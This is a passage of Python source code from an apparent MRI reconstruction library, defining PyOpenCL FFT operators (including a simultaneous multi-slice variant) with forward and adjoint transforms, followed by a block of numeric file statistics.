par["dimX"])
if par["fft_dim"] is not None:
self.fft_scale = DTYPE_real(
np.sqrt(np.prod(self.fft_shape[self.fft_dim[0]:])))
self._tmp_fft_array = (
clarray.zeros(
self.queue,
self.fft_shape,
dtype=DTYPE))
if par["use_GPU"]:
self.par_fft = int(
self.fft_shape[0] / par["NScan"])
else:
self.par_fft = self.fft_shape[0]
self.iternumber = int(self.fft_shape[0]/self.par_fft)
self.mask = clarray.to_device(self.queue, par["mask"])
self.fft = FFT(ctx, queue, self._tmp_fft_array[
0:self.par_fft, ...],
out_array=self._tmp_fft_array[
0:self.par_fft, ...],
axes=self.fft_dim)
def __del__(self):
"""Explicitly delete OpenCL Objets."""
if self.fft_dim is not None:
del self._tmp_fft_array
del self.fft
del self.mask
del self.queue
del self.ctx
del self.prg
def FFTH(self, sg, s, wait_for=None, scan_offset=0):
"""Perform the inverse (adjoint) FFT operation.
Parameters
----------
sg : PyOpenCL.Array
The complex image data.
s : PyOpenCL.Array
The uniformly gridded k-space
wait_for : list of PyopenCL.Event, None
A List of PyOpenCL events to wait for.
scan_offset : int, 0
Offset compared to the first acquired scan.
Returns
-------
PyOpenCL.Event: A PyOpenCL event to wait for.
"""
if wait_for is None:
wait_for = []
if self.fft_dim is not None:
self._tmp_fft_array.add_event(
self.prg.maskingcpy(
self.queue,
(self._tmp_fft_array.shape[0],
np.prod(self._tmp_fft_array.shape[1:])),
None,
self._tmp_fft_array.data,
s.data,
self.mask.data,
wait_for=s.events+self._tmp_fft_array.events+wait_for))
cl.wait_for_events(self._tmp_fft_array.events)
fft_events = []
for j in range(self.iternumber):
fft_events.append(self.fft.enqueue_arrays(
data=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
result=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
forward=False)[0])
return (
self.prg.copy(
self.queue,
(sg.size,
),
None,
sg.data,
self._tmp_fft_array.data,
self.DTYPE_real(
self.fft_scale),
wait_for=sg.events+fft_events))
return self.prg.copy(
self.queue,
(sg.size,
),
None,
sg.data,
s.data,
self.DTYPE_real(1),
wait_for=s.events+sg.events+wait_for)
def FFT(self, s, sg, wait_for=None, scan_offset=0):
"""Perform the forward FFT operation.
Parameters
----------
s : PyOpenCL.Array
The uniformly gridded k-space.
sg : PyOpenCL.Array
The complex image data.
wait_for : list of PyopenCL.Event, None
A List of PyOpenCL events to wait for.
scan_offset : int, 0
Offset compared to the first acquired scan.
Returns
-------
PyOpenCL.Event: A PyOpenCL event to wait for.
"""
if wait_for is None:
wait_for = []
if self.fft_dim is not None:
self._tmp_fft_array.add_event(
self.prg.copy(
self.queue,
(sg.size,
),
None,
self._tmp_fft_array.data,
sg.data,
self.DTYPE_real(
1 /
self.fft_scale),
wait_for=sg.events+self._tmp_fft_array.events+wait_for))
cl.wait_for_events(self._tmp_fft_array.events)
fft_events = []
for j in range(self.iternumber):
fft_events.append(self.fft.enqueue_arrays(
data=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
result=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
forward=True)[0])
return (
self.prg.maskingcpy(
self.queue,
(self._tmp_fft_array.shape[0],
np.prod(self._tmp_fft_array.shape[1:])),
None,
s.data,
self._tmp_fft_array.data,
self.mask.data,
wait_for=s.events+fft_events))
return self.prg.copy(
self.queue,
(sg.size,
),
None,
s.data,
sg.data,
self.DTYPE_real(1),
wait_for=s.events+sg.events+wait_for)
class PyOpenCLSMSNUFFT(PyOpenCLnuFFT):
"""Cartesian FFT-SMS object.
This class performs the FFT operation assuming a SMS acquisition.
Parameters
----------
ctx : PyOpenCL.Context
The context for the PyOpenCL computations.
queue : PyOpenCL.Queue
The computation Queue for the PyOpenCL kernels.
par : dict A python dict containing the necessary information to
setup the object. Needs to contain the number of slices (NSlice),
number of scans (NScan), image dimensions (dimX, dimY), number of
coils (NC), sampling points (N) and read outs (NProj)
a PyOpenCL queue (queue) and the complex coil
sensitivities (C).
DTYPE : Numpy.dtype
The comlex precision type. Currently complex64 is used.
DTYPE_real : Numpy.dtype
The real precision type. Currently float32 is used.
Attributes
----------
fft_shape : tuple of ints
3 dimensional tuple. Dim 0 containts all Scans, Coils and Slices.
Dim 1 and 2 the overgridded image dimensions.
fft_scale : float32
The scaling factor to achieve a good adjointness of the forward and
backward FFT.
par_fft : int
The number of parallel fft calls. Typically it iterates over the
Scans.
fft : gpyfft.fft.FFT
The fft object created from gpyfft (A wrapper for clFFT). The object
is created only once an reused in each iterations, iterationg over
all scans to keep the memory footprint low.
mask : PyOpenCL.Array
The undersampling mask for the Cartesian grid.
packs : int
The distance between the slices
MB : int
The multiband factor
shift : PyOpenCL.Array
The vector pixel shifts used in the fft computation.
prg : PyOpenCL.Program
The PyOpenCL.Program object containing the necessary kernels to
execute the linear Operator. This will be determined by the
factory and set after the object is created.
"""
def __init__(
self,
ctx,
queue,
par,
DTYPE=np.complex64,
DTYPE_real=np.float32,
streamed=False):
super().__init__(ctx, queue, par["fft_dim"], DTYPE, DTYPE_real)
if streamed:
self.fft_shape = (
par["NC"] *
par["NSlice"],
par["dimY"],
par["dimX"])
else:
self.fft_shape = (
par["NScan"] *
par["NC"] *
par["NSlice"],
par["dimY"],
par["dimX"])
self.packs = int(par["packs"])
self.MB = int(par["MB"])
self.shift = clarray.to_device(
self.queue, par["shift"].astype(DTYPE_real))
if par["fft_dim"] is not None:
self.fft_scale = DTYPE_real(
np.sqrt(np.prod(self.fft_shape[self.fft_dim[0]:])))
self._tmp_fft_array = (
clarray.zeros(
self.queue,
self.fft_shape,
dtype=DTYPE))
if par["use_GPU"] and not streamed:
self.par_fft = int(
self.fft_shape[0] / par["NScan"])
else:
self.par_fft = self.fft_shape[0]
self.iternumber = int(self.fft_shape[0]/self.par_fft)
self.mask = clarray.to_device(self.queue, par["mask"])
self.fft = FFT(ctx, queue, self._tmp_fft_array[
0:self.par_fft, ...],
out_array=self._tmp_fft_array[
0:self.par_fft, ...],
axes=self.fft_dim)
def __del__(self):
"""Explicitly delete OpenCL Objets."""
if self.fft_dim is not None:
del self._tmp_fft_array
del self.fft
del self.mask
del self.queue
del self.ctx
del self.prg
def FFTH(self, sg, s, wait_for=None, scan_offset=0):
"""Perform the inverse (adjoint) FFT operation.
Parameters
----------
sg : PyOpenCL.Array
The complex image data.
s : PyOpenCL.Array
The uniformly gridded k-space compressed by the MB factor.
wait_for : list of PyopenCL.Event, None
A List of PyOpenCL events to wait for.
scan_offset : int, 0
Offset compared to the first acquired scan.
Returns
-------
PyOpenCL.Event: A PyOpenCL event to wait for.
"""
if wait_for is None:
wait_for = []
if self.fft_dim is not None:
self._tmp_fft_array.add_event(
self.prg.copy_SMS_adjkspace(
self.queue,
(sg.shape[0] * sg.shape[1],
sg.shape[-2],
sg.shape[-1]),
None,
self._tmp_fft_array.data,
s.data,
self.shift.data,
self.mask.data,
np.int32(self.packs),
np.int32(self.MB),
self.DTYPE_real(self.fft_scale),
np.int32(sg.shape[2]/self.packs/self.MB),
wait_for=s.events+wait_for+self._tmp_fft_array.events))
cl.wait_for_events(self._tmp_fft_array.events)
fft_events = []
for j in range(self.iternumber):
fft_events.append(self.fft.enqueue_arrays(
data=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
result=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
forward=False)[0])
return (self.prg.copy(self.queue,
(sg.size,),
None,
sg.data,
self._tmp_fft_array.data,
self.DTYPE_real(self.fft_scale),
wait_for=sg.events+fft_events))
return self.prg.copy_SMS_adj(
self.queue,
(sg.shape[0] * sg.shape[1],
sg.shape[-2],
sg.shape[-1]),
None,
sg.data,
s.data,
self.shift.data,
self.mask.data,
np.int32(self.packs),
np.int32(self.MB),
self.DTYPE_real(1),
np.int32(sg.shape[2]/self.packs/self.MB),
wait_for=s.events+sg.events+wait_for)
def FFT(self, s, sg, wait_for=None, scan_offset=0):
"""Perform the forward FFT operation.
Parameters
----------
s : PyOpenCL.Array
The uniformly gridded k-space compressed by the MB factor.
sg : PyOpenCL.Array
The complex image data.
wait_for : list of PyopenCL.Event, None
A List of PyOpenCL events to wait for.
scan_offset : int, 0
Offset compared to the first acquired scan.
Returns
-------
PyOpenCL.Event: A PyOpenCL event to wait for.
"""
if wait_for is None:
wait_for = []
if self.fft_dim is not None:
self._tmp_fft_array.add_event(
self.prg.copy(
self.queue,
(sg.size,),
None,
self._tmp_fft_array.data,
sg.data,
self.DTYPE_real(1 / self.fft_scale),
wait_for=self._tmp_fft_array.events+sg.events+wait_for))
cl.wait_for_events(self._tmp_fft_array.events)
fft_events = []
for j in range(self.iternumber):
fft_events.append(self.fft.enqueue_arrays(
data=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
result=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
forward=True)[0])
return (
self.prg.copy_SMS_fwdkspace(
self.queue,
(s.shape[0] * s.shape[1], s.shape[-2], s.shape[-1]),
None,
s.data,
self._tmp_fft_array.data,
self.shift.data,
self.mask.data,
np.int32(self.packs),
np.int32(self.MB),
self.DTYPE_real(self.fft_scale),
np.int32(sg.shape[2]/self.packs/self.MB),
wait_for=s.events+fft_events+wait_for))
return (
self.prg.copy_SMS_fwd(
self.queue,
(s.shape[0] * s.shape[1], s.shape[-2], s.shape[-1]),
None,
s.data,
sg.data,
self.shift.data,
self.mask.data,
np.int32(self.packs),
np.int32(self.MB),
self.DTYPE_real(1),
np.int32(sg.shape[2]/self.packs/self.MB),
wait_for=s.events+sg.events+wait_for))
| 36.323122
| 79
| 0.507982
| 5,619
| 49,799
| 4.333155
| 0.063179
| 0.0345
| 0.049285
| 0.073928
| 0.929686
| 0.926565
| 0.922704
| 0.915886
| 0.913176
| 0.903277
| 0
| 0.011977
| 0.403141
| 49,799
| 1,370
| 80
| 36.349635
| 0.807186
| 0.287877
| 0
| 0.923166
| 0
| 0
| 0.020275
| 0.004519
| 0
| 0
| 0
| 0
| 0.002328
| 1
| 0.020955
| false
| 0
| 0.008149
| 0
| 0.050058
| 0.004657
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.